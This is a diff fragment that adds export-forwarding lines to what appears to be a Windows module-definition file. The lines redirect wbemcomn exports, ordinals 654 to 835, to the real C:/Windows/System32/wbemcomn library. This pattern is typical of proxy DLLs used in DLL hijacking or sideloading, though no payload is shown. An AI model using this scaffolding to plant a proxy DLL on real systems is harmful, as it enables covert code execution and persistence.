+    ?FinalizeMatchState@CLike@@AEAAXXZ=C:/Windows/System32/wbemcomn.?FinalizeMatchState@CLike@@AEAAXXZ @654
+    ?FindStr@CWStringArray@@QEAAHPEBGH@Z=C:/Windows/System32/wbemcomn.?FindStr@CWStringArray@@QEAAHPEBGH@Z @655
+    ?FlipOperator@CAbstractQl1Parser@@IEAAHH@Z=C:/Windows/System32/wbemcomn.?FlipOperator@CAbstractQl1Parser@@IEAAHH@Z @656
+    ?FlushRepository@CWbemInstallObject@@SAJXZ=C:/Windows/System32/wbemcomn.?FlushRepository@CWbemInstallObject@@SAJXZ @657
+    ?Free@CWin32DefaultArena@@UEAAHPEAX@Z=C:/Windows/System32/wbemcomn.?Free@CWin32DefaultArena@@UEAAHPEAX@Z @658
+    ?FreeMap@CWbemInstallObject@@SAXXZ=C:/Windows/System32/wbemcomn.?FreeMap@CWbemInstallObject@@SAXXZ @659
+    ?Get100nss@CWbemTime@@QEBA_JXZ=C:/Windows/System32/wbemcomn.?Get100nss@CWbemTime@@QEBA_JXZ @660
+    ?GetAbsoluteCopy@CNtSecurityDescriptor@@QEAAPEAUSNtAbsoluteSD@@XZ=C:/Windows/System32/wbemcomn.?GetAbsoluteCopy@CNtSecurityDescriptor@@QEAAPEAUSNtAbsoluteSD@@XZ @661
+    ?GetAccessMask@C9XAce@@UEAAKXZ=C:/Windows/System32/wbemcomn.?GetAccessMask@C9XAce@@UEAAKXZ @662
+    ?GetAccessMask@CNtAce@@UEAAKXZ=C:/Windows/System32/wbemcomn.?GetAccessMask@CNtAce@@UEAAKXZ @663
+    ?GetAce@CNtAcl@@QEAAHHAEAVCNtAce@@@Z=C:/Windows/System32/wbemcomn.?GetAce@CNtAcl@@QEAAHHAEAVCNtAce@@@Z @665
+    ?GetAce@CNtAcl@@QEAAPEAVCNtAce@@H@Z=C:/Windows/System32/wbemcomn.?GetAce@CNtAcl@@QEAAPEAVCNtAce@@H@Z @666
+    ?GetAclSizeInfo@CNtAcl@@QEAAHPEAK0@Z=C:/Windows/System32/wbemcomn.?GetAclSizeInfo@CNtAcl@@QEAAHPEAK0@Z @667
+    ?GetActiveImpersonation@CWbemCallSecurity@@UEAAJXZ=C:/Windows/System32/wbemcomn.?GetActiveImpersonation@CWbemCallSecurity@@UEAAJXZ @668
+    ?GetActualVarType@CSafeArray@@QEAAHPEAG@Z=C:/Windows/System32/wbemcomn.?GetActualVarType@CSafeArray@@QEAAHPEAG@Z @669
+    ?GetAreaFlags@CWMITraceSettings@@QEAAKXZ=C:/Windows/System32/wbemcomn.?GetAreaFlags@CWMITraceSettings@@QEAAKXZ @670
+    ?GetArenaHeap@CWin32DefaultArena@@SAPEAXXZ=C:/Windows/System32/wbemcomn.?GetArenaHeap@CWin32DefaultArena@@SAPEAXXZ @671
+    ?GetArray@CSafeArray@@QEAAPEAUtagSAFEARRAY@@XZ=C:/Windows/System32/wbemcomn.?GetArray@CSafeArray@@QEAAPEAUtagSAFEARRAY@@XZ @672
+    ?GetArrayCopy@CSafeArray@@QEAAPEAUtagSAFEARRAY@@XZ=C:/Windows/System32/wbemcomn.?GetArrayCopy@CSafeArray@@QEAAPEAUtagSAFEARRAY@@XZ @673
+    ?GetArrayPtr@CFlexArray@@QEAAPEAPEAXXZ=C:/Windows/System32/wbemcomn.?GetArrayPtr@CFlexArray@@QEAAPEAPEAXXZ @674
+    ?GetArrayPtr@CFlexArray@@QEBAPEBQEAXXZ=C:/Windows/System32/wbemcomn.?GetArrayPtr@CFlexArray@@QEBAPEBQEAXXZ @675
+    ?GetArrayPtr@CSmallArrayBlob@@QEAAPEAPEAXXZ=C:/Windows/System32/wbemcomn.?GetArrayPtr@CSmallArrayBlob@@QEAAPEAPEAXXZ @676
+    ?GetArrayPtr@CSmallArrayBlob@@QEBAPEBQEAXXZ=C:/Windows/System32/wbemcomn.?GetArrayPtr@CSmallArrayBlob@@QEBAPEBQEAXXZ @677
+    ?GetArrayPtr@CWStringArray@@QEAAPEAPEBGXZ=C:/Windows/System32/wbemcomn.?GetArrayPtr@CWStringArray@@QEAAPEAPEBGXZ @678
+    ?GetAt@CFlexArray@@QEBAPEAXH@Z=C:/Windows/System32/wbemcomn.?GetAt@CFlexArray@@QEBAPEAXH@Z @679
+    ?GetAt@CSmallArrayBlob@@QEBAPEAXH@Z=C:/Windows/System32/wbemcomn.?GetAt@CSmallArrayBlob@@QEBAPEAXH@Z @680
+    ?GetAt@CVarVector@@QEAAAEAVCVar@@H@Z=C:/Windows/System32/wbemcomn.?GetAt@CVarVector@@QEAAAEAVCVar@@H@Z @681
+    ?GetAt@CWStringArray@@QEBAPEAGH@Z=C:/Windows/System32/wbemcomn.?GetAt@CWStringArray@@QEBAPEAGH@Z @682
+    ?GetAuthenticationId@CWbemCallSecurity@@UEAAKAEAU_LUID@@@Z=C:/Windows/System32/wbemcomn.?GetAuthenticationId@CWbemCallSecurity@@UEAAKAEAU_LUID@@@Z @683
+    ?GetAutoRecoverFolder@CWbemInstallObject@@SAPEBGXZ=C:/Windows/System32/wbemcomn.?GetAutoRecoverFolder@CWbemInstallObject@@SAPEBGXZ @684
+    ?GetBSTR@CVar@@QEAAPEAGXZ=C:/Windows/System32/wbemcomn.?GetBSTR@CVar@@QEAAPEAGXZ @685
+    ?GetBSTRAt@CSafeArray@@QEAAPEAGH@Z=C:/Windows/System32/wbemcomn.?GetBSTRAt@CSafeArray@@QEAAPEAGH@Z @686
+    ?GetBSTRAtThrow@CSafeArray@@QEAAPEAGH@Z=C:/Windows/System32/wbemcomn.?GetBSTRAtThrow@CSafeArray@@QEAAPEAGH@Z @687
+    ?GetBinary@Registry@@QEAAHPEBGPEAPEAEPEAK@Z=C:/Windows/System32/wbemcomn.?GetBinary@Registry@@QEAAHPEBGPEAPEAEPEAK@Z @688
+    ?GetBinaryPath@CWbemInstallObject@@SAPEBGXZ=C:/Windows/System32/wbemcomn.?GetBinaryPath@CWbemInstallObject@@SAPEBGXZ @689
+    ?GetBlob@CVar@@QEAAPEAUtagBLOB@@XZ=C:/Windows/System32/wbemcomn.?GetBlob@CVar@@QEAAPEAUtagBLOB@@XZ @690
+    ?GetBool@CVar@@QEAAFXZ=C:/Windows/System32/wbemcomn.?GetBool@CVar@@QEAAFXZ @691
+    ?GetBoolAt@CSafeArray@@QEAAFH@Z=C:/Windows/System32/wbemcomn.?GetBoolAt@CSafeArray@@QEAAFH@Z @692
+    ?GetByte@CVar@@QEAAEXZ=C:/Windows/System32/wbemcomn.?GetByte@CVar@@QEAAEXZ @693
+    ?GetByteAt@CSafeArray@@QEAAEH@Z=C:/Windows/System32/wbemcomn.?GetByteAt@CSafeArray@@QEAAEH@Z @694
+    ?GetCallerIdentity@CWbemCallSecurity@@QEAAPEBGXZ=C:/Windows/System32/wbemcomn.?GetCallerIdentity@CWbemCallSecurity@@QEAAPEBGXZ @695
+    ?GetChar@CVar@@QEAADXZ=C:/Windows/System32/wbemcomn.?GetChar@CVar@@QEAADXZ @696
+    ?GetChildren@CClientOpsNode@@QEAAPEAV1@XZ=C:/Windows/System32/wbemcomn.?GetChildren@CClientOpsNode@@QEAAPEAV1@XZ @697
+    ?GetClsId@CVar@@QEAAPEAU_GUID@@XZ=C:/Windows/System32/wbemcomn.?GetClsId@CVar@@QEAAPEAU_GUID@@XZ @698
+    ?GetCompressedFileInfo@CMRCICompression@@SAHPEBGAEAW4CompressionLevel@1@AEAKAEAU_FILETIME@@AEA_J@Z=C:/Windows/System32/wbemcomn.?GetCompressedFileInfo@CMRCICompression@@SAHPEBGAEAW4CompressionLevel@1@AEAKAEAU_FILETIME@@AEA_J@Z @699
+    ?GetCreationTime@CEventLogRecord@@QEAA?AVCWbemTime@@XZ=C:/Windows/System32/wbemcomn.?GetCreationTime@CEventLogRecord@@QEAA?AVCWbemTime@@XZ @700
+    ?GetCultures@CMUILocaleList@@QEAAPEBGXZ=C:/Windows/System32/wbemcomn.?GetCultures@CMUILocaleList@@QEAAPEBGXZ @701
+    ?GetDMTF@CWbemTime@@AEAAHHKPEAG@Z=C:/Windows/System32/wbemcomn.?GetDMTF@CWbemTime@@AEAAHHKPEAG@Z @702
+    ?GetDWORD@CVar@@QEAAKXZ=C:/Windows/System32/wbemcomn.?GetDWORD@CVar@@QEAAKXZ @703
+    ?GetDWORD@Registry@@QEAAHPEBGPEAK@Z=C:/Windows/System32/wbemcomn.?GetDWORD@Registry@@QEAAHPEBGPEAK@Z @704
+    ?GetDWORDStr@Registry@@QEAAHPEBGPEAK@Z=C:/Windows/System32/wbemcomn.?GetDWORDStr@Registry@@QEAAHPEBGPEAK@Z @705
+    ?GetDacl@CNtSecurityDescriptor@@QEAAHAEAVCNtAcl@@@Z=C:/Windows/System32/wbemcomn.?GetDacl@CNtSecurityDescriptor@@QEAAHAEAVCNtAcl@@@Z @706
+    ?GetDacl@CNtSecurityDescriptor@@QEAAJPEAPEAVCNtAcl@@@Z=C:/Windows/System32/wbemcomn.?GetDacl@CNtSecurityDescriptor@@QEAAJPEAPEAVCNtAcl@@@Z @707
+    ?GetDacl@CNtSecurityDescriptor@@QEAAPEAVCNtAcl@@XZ=C:/Windows/System32/wbemcomn.?GetDacl@CNtSecurityDescriptor@@QEAAPEAVCNtAcl@@XZ @708
+    ?GetDay@CDateTimeParser@@QEAAEXZ=C:/Windows/System32/wbemcomn.?GetDay@CDateTimeParser@@QEAAEXZ @709
+    ?GetDispatch@CVar@@QEAAPEAUIDispatch@@XZ=C:/Windows/System32/wbemcomn.?GetDispatch@CVar@@QEAAPEAUIDispatch@@XZ @710
+    ?GetDispatchAt@CSafeArray@@QEAAPEAUIDispatch@@H@Z=C:/Windows/System32/wbemcomn.?GetDispatchAt@CSafeArray@@QEAAPEAUIDispatch@@H@Z @711
+    ?GetDouble@CVar@@QEAANXZ=C:/Windows/System32/wbemcomn.?GetDouble@CVar@@QEAANXZ @712
+    ?GetDoubleAt@CSafeArray@@QEAANH@Z=C:/Windows/System32/wbemcomn.?GetDoubleAt@CSafeArray@@QEAANH@Z @713
+    ?GetElementSize@CVarVector@@QEAAHXZ=C:/Windows/System32/wbemcomn.?GetElementSize@CVarVector@@QEAAHXZ @714
+    ?GetEmbeddedObject@CVar@@QEAAPEAUIUnknown@@XZ=C:/Windows/System32/wbemcomn.?GetEmbeddedObject@CVar@@QEAAPEAUIUnknown@@XZ @715
+    ?GetEnvironmentValue@CWbemInstallObject@@CAJPEBGPEAPEBG@Z=C:/Windows/System32/wbemcomn.?GetEnvironmentValue@CWbemInstallObject@@CAJPEBGPEAPEBG@Z @716
+    ?GetEventTraceProperties@CWMITraceSettings@@QEAAPEAU_EVENT_TRACE_PROPERTIES@@XZ=C:/Windows/System32/wbemcomn.?GetEventTraceProperties@CWMITraceSettings@@QEAAPEAU_EVENT_TRACE_PROPERTIES@@XZ @717
+    ?GetExpression@CLike@@QEAAPEBGXZ=C:/Windows/System32/wbemcomn.?GetExpression@CLike@@QEAAPEBGXZ @718
+    ?GetFILETIME@CWbemTime@@QEBAHPEAU_FILETIME@@@Z=C:/Windows/System32/wbemcomn.?GetFILETIME@CWbemTime@@QEBAHPEAU_FILETIME@@@Z @719
+    ?GetFileTime@CVar@@QEAA?AU_FILETIME@@XZ=C:/Windows/System32/wbemcomn.?GetFileTime@CVar@@QEAA?AU_FILETIME@@XZ @721
+    ?GetFirstFiringTime@CBasicUnloadInstruction@@UEBA?AVCWbemTime@@XZ=C:/Windows/System32/wbemcomn.?GetFirstFiringTime@CBasicUnloadInstruction@@UEBA?AVCWbemTime@@XZ @722
+    ?GetFirst_ms_XXX_Locale@CMUILocaleList@@QEAAJPEAPEAG@Z=C:/Windows/System32/wbemcomn.?GetFirst_ms_XXX_Locale@CMUILocaleList@@QEAAJPEAPEAG@Z @723
+    ?GetFlags@C9XAce@@UEAAHXZ=C:/Windows/System32/wbemcomn.?GetFlags@C9XAce@@UEAAHXZ @724
+    ?GetFlags@CNtAce@@UEAAHXZ=C:/Windows/System32/wbemcomn.?GetFlags@CNtAce@@UEAAHXZ @725
+    ?GetFloat@CVar@@QEAAMXZ=C:/Windows/System32/wbemcomn.?GetFloat@CVar@@QEAAMXZ @726
+    ?GetFloatAt@CSafeArray@@QEAAMH@Z=C:/Windows/System32/wbemcomn.?GetFloatAt@CSafeArray@@QEAAMH@Z @727
+    ?GetFunctionPointers@CMUILocale@@CAJXZ=C:/Windows/System32/wbemcomn.?GetFunctionPointers@CMUILocale@@CAJXZ @728
+    ?GetFunctionPointers@CPublishWMIOperationEvent@@SAJXZ=C:/Windows/System32/wbemcomn.?GetFunctionPointers@CPublishWMIOperationEvent@@SAJXZ @729
+    ?GetGroup@CNtSecurityDescriptor@@QEAAPEAVCNtSid@@XZ=C:/Windows/System32/wbemcomn.?GetGroup@CNtSecurityDescriptor@@QEAAPEAVCNtSid@@XZ @731
+    ?GetHandle@CPropertyName@@QEAAPEAXXZ=C:/Windows/System32/wbemcomn.?GetHandle@CPropertyName@@QEAAPEAXXZ @732
+    ?GetHours@CDateTimeParser@@QEAAEXZ=C:/Windows/System32/wbemcomn.?GetHours@CDateTimeParser@@QEAAEXZ @733
+    ?GetIdleTimeout@CExecQueue@@MEAAKPEAVCThreadRecord@1@@Z=C:/Windows/System32/wbemcomn.?GetIdleTimeout@CExecQueue@@MEAAKPEAVCThreadRecord@1@@Z @734
+    ?GetIndex@CBuffer@@QEAAKXZ=C:/Windows/System32/wbemcomn.?GetIndex@CBuffer@@QEAAKXZ @735
+    ?GetInfinity@CWbemInterval@@SA?AV1@XZ=C:/Windows/System32/wbemcomn.?GetInfinity@CWbemInterval@@SA?AV1@XZ @736
+    ?GetInfinity@CWbemTime@@SA?AV1@XZ=C:/Windows/System32/wbemcomn.?GetInfinity@CWbemTime@@SA?AV1@XZ @737
+    ?GetInfo@CClientOpsNode@@QEAAPEAXXZ=C:/Windows/System32/wbemcomn.?GetInfo@CClientOpsNode@@QEAAPEAXXZ @738
+    ?GetInfo@CNtSid@@QEAAHPEAPEAG0PEAK@Z=C:/Windows/System32/wbemcomn.?GetInfo@CNtSid@@QEAAHPEAPEAG0PEAK@Z @739
+    ?GetInnerUnknown@CUnk@@QEAAPEAUIUnknown@@XZ=C:/Windows/System32/wbemcomn.?GetInnerUnknown@CUnk@@QEAAPEAUIUnknown@@XZ @740
+    ?GetInstructionType@CBasicUnloadInstruction@@UEAAHXZ=C:/Windows/System32/wbemcomn.?GetInstructionType@CBasicUnloadInstruction@@UEAAHXZ @741
+    ?GetLPSTR@CVar@@QEAAPEADXZ=C:/Windows/System32/wbemcomn.?GetLPSTR@CVar@@QEAAPEADXZ @742
+    ?GetLPSTR@WString2@@QEBAPEADXZ=C:/Windows/System32/wbemcomn.?GetLPSTR@WString2@@QEBAPEADXZ @743
+    ?GetLPSTR@WString@@QEBAPEADXZ=C:/Windows/System32/wbemcomn.?GetLPSTR@WString@@QEBAPEADXZ @744
+    ?GetLPWSTR@CVar@@QEAAPEAGXZ=C:/Windows/System32/wbemcomn.?GetLPWSTR@CVar@@QEAAPEAGXZ @745
+    ?GetLToken@WString2@@QEBAPEAGG@Z=C:/Windows/System32/wbemcomn.?GetLToken@WString2@@QEBAPEAGG@Z @746
+    ?GetLToken@WString@@QEBAPEAGG@Z=C:/Windows/System32/wbemcomn.?GetLToken@WString@@QEBAPEAGG@Z @747
+    ?GetLastError@Registry@@QEAAJXZ=C:/Windows/System32/wbemcomn.?GetLastError@Registry@@QEAAJXZ @748
+    ?GetLocalInfoAndAlloc@CDateTimeParser@@IEAAXKAEAPEAG@Z=C:/Windows/System32/wbemcomn.?GetLocalInfoAndAlloc@CDateTimeParser@@IEAAXKAEAPEAG@Z @749
+    ?GetLocalOffsetForDate@CWbemTime@@SAJPEBU_SYSTEMTIME@@@Z=C:/Windows/System32/wbemcomn.?GetLocalOffsetForDate@CWbemTime@@SAJPEBU_SYSTEMTIME@@@Z @750
+    ?GetLocales@CMUILocaleList@@QEAAPEBGXZ=C:/Windows/System32/wbemcomn.?GetLocales@CMUILocaleList@@QEAAPEBGXZ @751
+    ?GetLockCount@CWbemCriticalSection@@QEAAJXZ=C:/Windows/System32/wbemcomn.?GetLockCount@CWbemCriticalSection@@QEAAJXZ @752
+    ?GetLong@CVar@@QEAAJXZ=C:/Windows/System32/wbemcomn.?GetLong@CVar@@QEAAJXZ @754
+    ?GetLongAt@CSafeArray@@QEAAJH@Z=C:/Windows/System32/wbemcomn.?GetLongAt@CSafeArray@@QEAAJH@Z @755
+    ?GetMicroseconds@CDateTimeParser@@QEAAIXZ=C:/Windows/System32/wbemcomn.?GetMicroseconds@CDateTimeParser@@QEAAIXZ @757
+    ?GetMilliseconds@CWbemInterval@@QEBAKXZ=C:/Windows/System32/wbemcomn.?GetMilliseconds@CWbemInterval@@QEBAKXZ @758
+    ?GetMinutes@CDateTimeParser@@QEAAEXZ=C:/Windows/System32/wbemcomn.?GetMinutes@CDateTimeParser@@QEAAEXZ @759
+    ?GetMonth@CDateTimeParser@@QEAAEXZ=C:/Windows/System32/wbemcomn.?GetMonth@CDateTimeParser@@QEAAEXZ @760
+    ?GetMultiStr@Registry@@QEAAPEAGPEBGAEAK@Z=C:/Windows/System32/wbemcomn.?GetMultiStr@Registry@@QEAAPEAGPEBGAEAK@Z @761
+    ?GetNewSafeArray@CVar@@QEAAPEAUtagSAFEARRAY@@XZ=C:/Windows/System32/wbemcomn.?GetNewSafeArray@CVar@@QEAAPEAUtagSAFEARRAY@@XZ @762
+    ?GetNewSafeArray@CVarVector@@QEAAPEAUtagSAFEARRAY@@XZ=C:/Windows/System32/wbemcomn.?GetNewSafeArray@CVarVector@@QEAAPEAUtagSAFEARRAY@@XZ @763
+    ?GetNewVariant@CVar@@QEAAPEAUtagVARIANT@@XZ=C:/Windows/System32/wbemcomn.?GetNewVariant@CVar@@QEAAPEAUtagVARIANT@@XZ @764
+    ?GetNext@CClientOpsNode@@QEAAPEAV1@XZ=C:/Windows/System32/wbemcomn.?GetNext@CClientOpsNode@@QEAAPEAV1@XZ @765
+    ?GetNext@CExecRequest@@QEAAPEAV1@XZ=C:/Windows/System32/wbemcomn.?GetNext@CExecRequest@@QEAAPEAV1@XZ @766
+    ?GetNextElement@CCircularQueue@@QEAAKPEAPEAULOG_ELEMENT@@@Z=C:/Windows/System32/wbemcomn.?GetNextElement@CCircularQueue@@QEAAKPEAPEAULOG_ELEMENT@@@Z @767
+    ?GetNextFiringTime@CBasicUnloadInstruction@@UEBA?AVCWbemTime@@V2@PEAJ@Z=C:/Windows/System32/wbemcomn.?GetNextFiringTime@CBasicUnloadInstruction@@UEBA?AVCWbemTime@@V2@PEAJ@Z @768
+    ?GetNumAces@CNtAcl@@QEAAHXZ=C:/Windows/System32/wbemcomn.?GetNumAces@CNtAcl@@QEAAHXZ @769
+    ?GetNumElements@CPropertyName@@QEBAJXZ=C:/Windows/System32/wbemcomn.?GetNumElements@CPropertyName@@QEBAJXZ @770
+    ?GetNumInstructions@CInstructionQueue@@QEAAJXZ=C:/Windows/System32/wbemcomn.?GetNumInstructions@CInstructionQueue@@QEAAJXZ @771
+    ?GetNumStrings@CEventLogRecord@@QEAAGXZ=C:/Windows/System32/wbemcomn.?GetNumStrings@CEventLogRecord@@QEAAGXZ @772
+    ?GetOleType@CVar@@QEAAHXZ=C:/Windows/System32/wbemcomn.?GetOleType@CVar@@QEAAHXZ @773
+    ?GetOwner@CNtSecurityDescriptor@@QEAAPEAVCNtSid@@XZ=C:/Windows/System32/wbemcomn.?GetOwner@CNtSecurityDescriptor@@QEAAPEAVCNtSid@@XZ @774
+    ?GetOwningThreadId@CWbemCriticalSection@@QEAAKXZ=C:/Windows/System32/wbemcomn.?GetOwningThreadId@CWbemCriticalSection@@QEAAKXZ @775
+    ?GetPart@CDatePart@@QEAAJHPEAH@Z=C:/Windows/System32/wbemcomn.?GetPart@CDatePart@@QEAAJHPEAH@Z @776
+    ?GetPersistentCfgValue@CPersistentConfig@@QEAAHKAEAK@Z=C:/Windows/System32/wbemcomn.?GetPersistentCfgValue@CPersistentConfig@@QEAAHKAEAK@Z @777
+    ?GetPotentialImpersonation@CWbemCallSecurity@@UEAAJXZ=C:/Windows/System32/wbemcomn.?GetPotentialImpersonation@CWbemCallSecurity@@UEAAJXZ @778
+    ?GetPreferedDateFormat@CDateTimeParser@@IEAAXXZ=C:/Windows/System32/wbemcomn.?GetPreferedDateFormat@CDateTimeParser@@IEAAXXZ @779
+    ?GetPreferredLanguages@CMUILocale@@SAJKPEAPEAGPEAK@Z=C:/Windows/System32/wbemcomn.?GetPreferredLanguages@CMUILocale@@SAJKPEAPEAGPEAK@Z @780
+    ?GetPreferredLanguages@CMUILocale@@SAJPEAPEAGPEAK@Z=C:/Windows/System32/wbemcomn.?GetPreferredLanguages@CMUILocale@@SAJPEAPEAGPEAK@Z @781
+    ?GetPrevious@CClientOpsNode@@QEAAPEAV1@XZ=C:/Windows/System32/wbemcomn.?GetPrevious@CClientOpsNode@@QEAAPEAV1@XZ @782
+    ?GetPriority@CExecRequest@@QEAAJXZ=C:/Windows/System32/wbemcomn.?GetPriority@CExecRequest@@QEAAJXZ @783
+    ?GetPropertyFromIUnknown@CTextTemplate@@AEAAPEAGPEAGPEAUIUnknown@@@Z=C:/Windows/System32/wbemcomn.?GetPropertyFromIUnknown@CTextTemplate@@AEAAPEAGPEAGPEAUIUnknown@@@Z @784
+    ?GetPtr@CNtAce@@QEAAPEAU_ACCESS_ALLOWED_ACE@@XZ=C:/Windows/System32/wbemcomn.?GetPtr@CNtAce@@QEAAPEAU_ACCESS_ALLOWED_ACE@@XZ @785
+    ?GetPtr@CNtAcl@@QEAAPEAU_ACL@@XZ=C:/Windows/System32/wbemcomn.?GetPtr@CNtAcl@@QEAAPEAU_ACL@@XZ @786
+    ?GetPtr@CNtSecurityDescriptor@@QEAAPEAXXZ=C:/Windows/System32/wbemcomn.?GetPtr@CNtSecurityDescriptor@@QEAAPEAXXZ @787
+    ?GetPtr@CNtSid@@QEAAPEAXXZ=C:/Windows/System32/wbemcomn.?GetPtr@CNtSid@@QEAAPEAXXZ @788
+    ?GetQWORD@Registry@@QEAAHPEBGPEA_K@Z=C:/Windows/System32/wbemcomn.?GetQWORD@Registry@@QEAAHPEBGPEA_K@Z @790
+    ?GetQueryClass@QL1_Parser@@QEAAHPEAGH@Z=C:/Windows/System32/wbemcomn.?GetQueryClass@QL1_Parser@@QEAAHPEAGH@Z @791
+    ?GetQueueSize@CFlexQueue@@QEBAHXZ=C:/Windows/System32/wbemcomn.?GetQueueSize@CFlexQueue@@QEBAHXZ @792
+    ?GetRawArrayData@CVarVector@@QEAAJPEAXH@Z=C:/Windows/System32/wbemcomn.?GetRawArrayData@CVarVector@@QEAAJPEAXH@Z @793
+    ?GetRawData@CBuffer@@QEAAPEAEXZ=C:/Windows/System32/wbemcomn.?GetRawData@CBuffer@@QEAAPEAEXZ @794
+    ?GetRawData@CSafeArray@@QEAAHPEAXH@Z=C:/Windows/System32/wbemcomn.?GetRawData@CSafeArray@@QEAAHPEAXH@Z @795
+    ?GetRawData@CVar@@QEAAPEAXXZ=C:/Windows/System32/wbemcomn.?GetRawData@CVar@@QEAAPEAXXZ @796
+    ?GetRecursionCount@CWbemCriticalSection@@QEAAJXZ=C:/Windows/System32/wbemcomn.?GetRecursionCount@CWbemCriticalSection@@QEAAJXZ @797
+    ?GetReferencedAliases@CWQLScanner@@QEAAHAEAVCWStringArray@@@Z=C:/Windows/System32/wbemcomn.?GetReferencedAliases@CWQLScanner@@QEAAHAEAVCWStringArray@@@Z @798
+    ?GetReferencedTables@CWQLScanner@@QEAAHAEAVCWStringArray@@@Z=C:/Windows/System32/wbemcomn.?GetReferencedTables@CWQLScanner@@QEAAHAEAVCWStringArray@@@Z @799
+    ?GetRegistryPathCIMOM@CWbemInstallObject@@SAPEBGXZ=C:/Windows/System32/wbemcomn.?GetRegistryPathCIMOM@CWbemInstallObject@@SAPEBGXZ @800
+    ?GetRegistryPathWbem@CWbemInstallObject@@SAPEBGXZ=C:/Windows/System32/wbemcomn.?GetRegistryPathWbem@CWbemInstallObject@@SAPEBGXZ @801
+    ?GetRepositoryFolder@CWbemInstallObject@@SAPEBGXZ=C:/Windows/System32/wbemcomn.?GetRepositoryFolder@CWbemInstallObject@@SAPEBGXZ @802
+    ?GetSYSTEMTIME@CWbemTime@@QEBAHPEAU_SYSTEMTIME@@@Z=C:/Windows/System32/wbemcomn.?GetSYSTEMTIME@CWbemTime@@QEBAHPEAU_SYSTEMTIME@@@Z @803
+    ?GetSacl@CNtSecurityDescriptor@@QEAAJPEAPEAVCNtAcl@@@Z=C:/Windows/System32/wbemcomn.?GetSacl@CNtSecurityDescriptor@@QEAAJPEAPEAVCNtAcl@@@Z @804
+    ?GetSacl@CNtSecurityDescriptor@@QEAAPEAVCNtAcl@@XZ=C:/Windows/System32/wbemcomn.?GetSacl@CNtSecurityDescriptor@@QEAAPEAVCNtAcl@@XZ @805
+    ?GetSafeArray@CVarVector@@QEAAPEAUtagSAFEARRAY@@H@Z=C:/Windows/System32/wbemcomn.?GetSafeArray@CVarVector@@QEAAPEAUtagSAFEARRAY@@H@Z @806
+    ?GetScalarAt@CSafeArray@@AEAA?ATSA_ArrayScalar@@H@Z=C:/Windows/System32/wbemcomn.?GetScalarAt@CSafeArray@@AEAA?ATSA_ArrayScalar@@H@Z @807
+    ?GetSeconds@CDateTimeParser@@QEAAEXZ=C:/Windows/System32/wbemcomn.?GetSeconds@CDateTimeParser@@QEAAEXZ @808
+    ?GetSeconds@CWbemInterval@@QEBAKXZ=C:/Windows/System32/wbemcomn.?GetSeconds@CWbemInterval@@QEBAKXZ @809
+    ?GetSelectedColumns@CWQLScanner@@QEAAPEBVCFlexArray@@XZ=C:/Windows/System32/wbemcomn.?GetSelectedColumns@CWQLScanner@@QEAAPEBVCFlexArray@@XZ @811
+    ?GetSerializedSize@C9XAce@@UEAAKXZ=C:/Windows/System32/wbemcomn.?GetSerializedSize@C9XAce@@UEAAKXZ @812
+    ?GetSerializedSize@CNtAce@@UEAAKXZ=C:/Windows/System32/wbemcomn.?GetSerializedSize@CNtAce@@UEAAKXZ @813
+    ?GetSessionName@CWMITraceSettings@@QEAAPEAGXZ=C:/Windows/System32/wbemcomn.?GetSessionName@CWMITraceSettings@@QEAAPEAGXZ @814
+    ?GetShort@CVar@@QEAAFXZ=C:/Windows/System32/wbemcomn.?GetShort@CVar@@QEAAFXZ @815
+    ?GetShortAt@CSafeArray@@QEAAFH@Z=C:/Windows/System32/wbemcomn.?GetShortAt@CSafeArray@@QEAAFH@Z @816
+    ?GetSid@CNtAce@@QEAAHAEAVCNtSid@@@Z=C:/Windows/System32/wbemcomn.?GetSid@CNtAce@@QEAAHAEAVCNtSid@@@Z @817
+    ?GetSid@CNtAce@@QEAAPEAVCNtSid@@XZ=C:/Windows/System32/wbemcomn.?GetSid@CNtAce@@QEAAPEAVCNtSid@@XZ @818
+    ?GetSidFromThreadOrProcess@CIdentitySecurity@@AEAAJAEAVCNtSid@@@Z=C:/Windows/System32/wbemcomn.?GetSidFromThreadOrProcess@CIdentitySecurity@@AEAAJAEAVCNtSid@@@Z @819
+    ?GetSinglePropertyName@CAbstractQl1Parser@@IEAAPEBGXZ=C:/Windows/System32/wbemcomn.?GetSinglePropertyName@CAbstractQl1Parser@@IEAAPEBGXZ @820
+    ?GetSitoutPenalty@CExecQueue@@QEAAKXZ=C:/Windows/System32/wbemcomn.?GetSitoutPenalty@CExecQueue@@QEAAKXZ @821
+    ?GetSize@CBuffer@@QEAAKXZ=C:/Windows/System32/wbemcomn.?GetSize@CBuffer@@QEAAKXZ @822
+    ?GetSize@CNtAce@@QEAAKXZ=C:/Windows/System32/wbemcomn.?GetSize@CNtAce@@QEAAKXZ @823
+    ?GetSize@CNtAcl@@QEAAKXZ=C:/Windows/System32/wbemcomn.?GetSize@CNtAcl@@QEAAKXZ @824
+    ?GetSize@CNtSecurityDescriptor@@QEAAKXZ=C:/Windows/System32/wbemcomn.?GetSize@CNtSecurityDescriptor@@QEAAKXZ @825
+    ?GetSize@CNtSid@@QEAAKXZ=C:/Windows/System32/wbemcomn.?GetSize@CNtSid@@QEAAKXZ @826
+    ?GetStatus@C9XAce@@UEAAKXZ=C:/Windows/System32/wbemcomn.?GetStatus@C9XAce@@UEAAKXZ @827
+    ?GetStatus@CNtAce@@UEAAKXZ=C:/Windows/System32/wbemcomn.?GetStatus@CNtAce@@UEAAKXZ @828
+    ?GetStatus@CNtAcl@@QEAAKXZ=C:/Windows/System32/wbemcomn.?GetStatus@CNtAcl@@QEAAKXZ @829
+    ?GetStatus@CNtSecurityDescriptor@@QEAAKXZ=C:/Windows/System32/wbemcomn.?GetStatus@CNtSecurityDescriptor@@QEAAKXZ @830
+    ?GetStatus@CNtSid@@QEAAKXZ=C:/Windows/System32/wbemcomn.?GetStatus@CNtSid@@QEAAKXZ @831
+    ?GetStr@Registry@@QEAAHPEBGPEAPEAG@Z=C:/Windows/System32/wbemcomn.?GetStr@Registry@@QEAAHPEBGPEAPEAG@Z @832
+    ?GetString@CInsertionString@@QEAAPEBGXZ=C:/Windows/System32/wbemcomn.?GetString@CInsertionString@@QEAAPEBGXZ @833
+    ?GetStringAt@CEventLogRecord@@QEAAPEBGH@Z=C:/Windows/System32/wbemcomn.?GetStringAt@CEventLogRecord@@QEAAPEBGH@Z @834
+    ?GetStringAt@CPropertyName@@QEBAPEBGJ@Z=C:/Windows/System32/wbemcomn.?GetStringAt@CPropertyName@@QEBAPEBGJ@Z @835
